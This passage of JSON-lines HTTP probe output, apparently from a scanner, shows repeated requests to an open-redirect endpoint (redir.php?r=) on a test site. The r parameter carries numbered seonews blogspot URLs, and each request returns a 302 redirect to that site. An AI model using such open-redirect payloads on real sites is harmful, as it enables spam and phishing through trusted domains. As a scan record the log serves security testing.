":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:01.077655915Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1594.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1594.blogspot.com/\",\"location\":\"http://seonews1594.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1594.blogspot.com/\",\"time\":\"347.999316ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:01.134500056Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1596.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1596.blogspot.com/\",\"location\":\"http://seonews1596.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1596.blogspot.com/\",\"time\":\"353.298852ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:01.324450467Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1597.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1597.blogspot.com/\",\"location\":\"http://seonews1597.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1597.blogspot.com/\",\"time\":\"352.325457ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:01.847790773Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1597.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1597.blogspot.com/management.html\",\"location\":\"http://seonews1597.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1597.blogspot.com/management.html\",\"time\":\"345.206215ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:01.879246224Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1598.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1598.blogspot.com/\",\"location\":\"http://seonews1598.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1598.blogspot.com/\",\"time\":\"348.178153ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:03.616472221Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1599.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1599.blogspot.com/\",\"location\":\"http://seonews1599.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1599.blogspot.com/\",\"time\":\"348.546746ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:04.863470015Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1599.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1599.blogspot.com/management.html\",\"location\":\"http://seonews1599.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1599.blogspot.com/management.html\",\"time\":\"354.593315ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:04.906280563Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1600.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1600.blogspot.com/\",\"location\":\"http://seonews1600.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1600.blogspot.com/\",\"time\":\"342.560917ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:05.249636485Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1601.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1601.blogspot.com/management.html\",\"location\":\"http://seonews1601.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1601.blogspot.com/management.html\",\"time\":\"346.861806ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:06.090763958Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1602.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1602.blogspot.com/\",\"location\":\"http://seonews1602.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1602.blogspot.com/\",\"time\":\"356.485498ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:06.126872267Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1603.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1603.blogspot.com/\",\"location\":\"http://seonews1603.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1603.blogspot.com/\",\"time\":\"356.024347ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:06.157484953Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1604.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1604.blogspot.com/management.html\",\"location\":\"http://seonews1604.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1604.blogspot.com/management.html\",\"time\":\"348.60968ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:06.169365006Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1605.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1605.blogspot.com/\",\"location\":\"http://seonews1605.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1605.blogspot.com/\",\"time\":\"349.080418ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:06.514552272Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1608.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1608.blogspot.com/\",\"location\":\"http://seonews1608.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1608.blogspot.com/\",\"time\":\"348.884568ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:06.521514698Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1609.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1609.blogspot.com/\",\"location\":\"http://seonews1609.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1609.blogspot.com/\",\"time\":\"346.270101ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:06.586113508Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1609.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1609.blogspot.com/management.html\",\"location\":\"http://seonews1609.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1609.blogspot.com/management.html\",\"time\":\"347.620063ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:06.638841161Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1611.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1611.blogspot.com/\",\"location\":\"http://seonews1611.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1611.blogspot.com/\",\"time\":\"350.959407ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:06.644782878Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1612.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1612.blogspot.com/management.html\",\"location\":\"http://seonews1612.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1612.blogspot.com/management.html\",\"time\":\"339.902498ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:06.766262246Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1613.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1613.blogspot.com/\",\"location\":\"http://seonews1613.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1613.blogspot.com/\",\"time\":\"352.764507ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:06.799788072Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1613.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1613.blogspot.com/management.html\",\"location\":\"http://seonews1613.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1613.blogspot.com/management.html\",\"time\":\"338.746001ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:06.844364327Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1614.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1614.blogspot.com/management.html\",\"location\":\"http://seonews1614.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1614.blogspot.com/management.html\",\"time\":\"339.286496ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:06.916757799Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1615.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1615.blogspot.com/\",\"location\":\"http://seonews1615.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1615.blogspot.com/\",\"time\":\"342.799346ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:07.000947056Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1616.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1616.blogspot.com/management.html\",\"location\":\"http://seonews1616.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1616.blogspot.com/management.html\",\"time\":\"344.514162ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:07.082032591Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1617.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1617.blogspot.com/\",\"location\":\"http://seonews1617.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1617.blogspot.com/\",\"time\":\"360.894084ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:07.166990062Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1617.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1617.blogspot.com/management.html\",\"location\":\"http://seonews1617.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1617.blogspot.com/management.html\",\"time\":\"339.929975ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:10.322245777Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1618.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1618.blogspot.com/management.html\",\"location\":\"http://seonews1618.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1618.blogspot.com/management.html\",\"time\":\"352.118828ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:10.563132272Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1619.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1619.blogspot.com/management.html\",\"location\":\"http://seonews1619.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1619.blogspot.com/management.html\",\"time\":\"352.206022ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:10.572649674Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1621.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1621.blogspot.com/\",\"location\":\"http://seonews1621.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1621.blogspot.com/\",\"time\":\"342.561922ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:10.635246908Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1621.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1621.blogspot.com/management.html\",\"location\":\"http://seonews1621.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1621.blogspot.com/management.html\",\"time\":\"352.601693ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:11.04249786Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1623.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1623.blogspot.com/\",\"location\":\"http://seonews1623.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1623.blogspot.com/\",\"time\":\"346.343488ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:11.436204584Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1623.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1623.blogspot.com/management.html\",\"location\":\"http://seonews1623.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1623.blogspot.com/management.html\",\"time\":\"356.442324ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:11.483953015Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1624.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1624.blogspot.com/\",\"location\":\"http://seonews1624.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1624.blogspot.com/\",\"time\":\"347.554697ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:11.682506655Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1625.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1625.blogspot.com/management.html\",\"location\":\"http://seonews1625.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1625.blogspot.com/management.html\",\"time\":\"356.195255ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:12.206012323Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1626.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1626.blogspot.com/\",\"location\":\"http://seonews1626.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1626.blogspot.com/\",\"time\":\"356.314554ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:12.235635275Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1630.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1630.blogspot.com/\",\"location\":\"http://seonews1630.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1630.blogspot.com/\",\"time\":\"353.98837ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:13.962503688Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1631.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1631.blogspot.com/management.html\",\"location\":\"http://seonews1631.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://seonews1631.blogspot.com/management.html\",\"time\":\"343.954351ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:31:15.221042607Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1632.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://seonews1632.blogspot.com/management.html\",\"location\":\"http://seonews1632.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1